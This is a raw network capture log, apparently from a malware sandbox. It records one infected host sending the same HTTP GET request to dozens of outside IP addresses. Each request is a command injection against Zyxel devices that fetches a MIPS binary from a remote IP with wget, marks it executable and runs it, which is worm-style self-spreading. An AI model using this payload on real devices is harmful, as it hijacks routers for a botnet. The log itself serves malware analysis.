                                                Jan 29, 2024 07:07:57.524549961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6698192.168.2.234224420.23.34.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524612904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6699192.168.2.2356922182.93.142.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524621964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6700192.168.2.2360560173.204.211.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524667978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6701192.168.2.233875290.236.128.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524696112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6702192.168.2.235182890.51.189.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524753094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6703192.168.2.234272284.156.54.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524765015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6704192.168.2.2340262131.248.19.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524804115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6705192.168.2.235955619.49.219.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524853945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6706192.168.2.2345356124.108.174.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524882078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6707192.168.2.2333746196.224.224.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524928093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6708192.168.2.235621483.146.0.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524960995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6709192.168.2.2352456198.211.41.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525016069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6710192.168.2.2337826159.245.185.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525043011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6711192.168.2.234159467.111.137.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525091887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6712192.168.2.2348620101.131.41.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525129080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6713192.168.2.2352162168.25.49.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525161982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6714192.168.2.23606889.74.34.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525217056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6715192.168.2.2359514218.149.25.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525243044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6716192.168.2.2360290148.13.124.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525283098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6717192.168.2.23544305.138.215.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525324106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6718192.168.2.2354146108.7.34.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525363922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6719192.168.2.2345666169.6.63.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525403023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6720192.168.2.2335828100.34.137.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525443077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6721192.168.2.2356850162.132.1.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525480986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6722192.168.2.2350420195.29.133.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525532961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6723192.168.2.233733647.84.206.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525585890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6724192.168.2.233278448.118.153.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525619984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6725192.168.2.235230636.240.47.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525659084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6726192.168.2.235331684.163.80.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525691986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6727192.168.2.2339540118.170.109.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525706053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6728192.168.2.233701664.53.225.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525758028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6729192.168.2.2360452178.81.45.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525777102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6730192.168.2.2347924217.213.119.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525830984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6731192.168.2.2357022192.68.134.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525856018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6732192.168.2.234114225.140.96.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525904894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6733192.168.2.2350612176.113.232.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525949001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6734192.168.2.235595252.29.190.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.525979996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6735192.168.2.2357038191.115.211.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526048899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6736192.168.2.2343348199.206.56.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526067019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6737192.168.2.235287020.107.72.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526115894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6738192.168.2.2353662117.4.101.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526144981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6739192.168.2.2350134121.6.88.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526186943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6740192.168.2.2346288139.68.39.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526231050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6741192.168.2.2348314174.143.186.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526283026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6742192.168.2.234301070.217.206.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526288986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6743192.168.2.2350638219.49.253.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526333094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6744192.168.2.233617420.20.209.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526387930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6745192.168.2.2356372155.213.92.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526442051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6746192.168.2.233875488.237.164.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526462078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6747192.168.2.2332998183.28.88.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526501894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6748192.168.2.2354438132.202.186.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526532888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6749192.168.2.2346446126.164.15.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526576042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6750192.168.2.2336936190.31.159.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526597023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6751192.168.2.235141648.23.50.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526650906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6752192.168.2.233857897.115.107.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526681900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6753192.168.2.2356728196.80.169.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526734114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6754192.168.2.235704688.203.252.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526767969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6755192.168.2.2343346141.92.212.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526801109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6756192.168.2.2343358158.123.231.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526823044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6757192.168.2.234828858.245.58.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526918888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6758192.168.2.2348086172.227.28.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526938915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6759192.168.2.235052277.169.60.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526947021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6760192.168.2.2333226112.65.217.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.526973009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6761192.168.2.2343270143.166.149.239443
                                                TimestampBytes transferredDirectionData
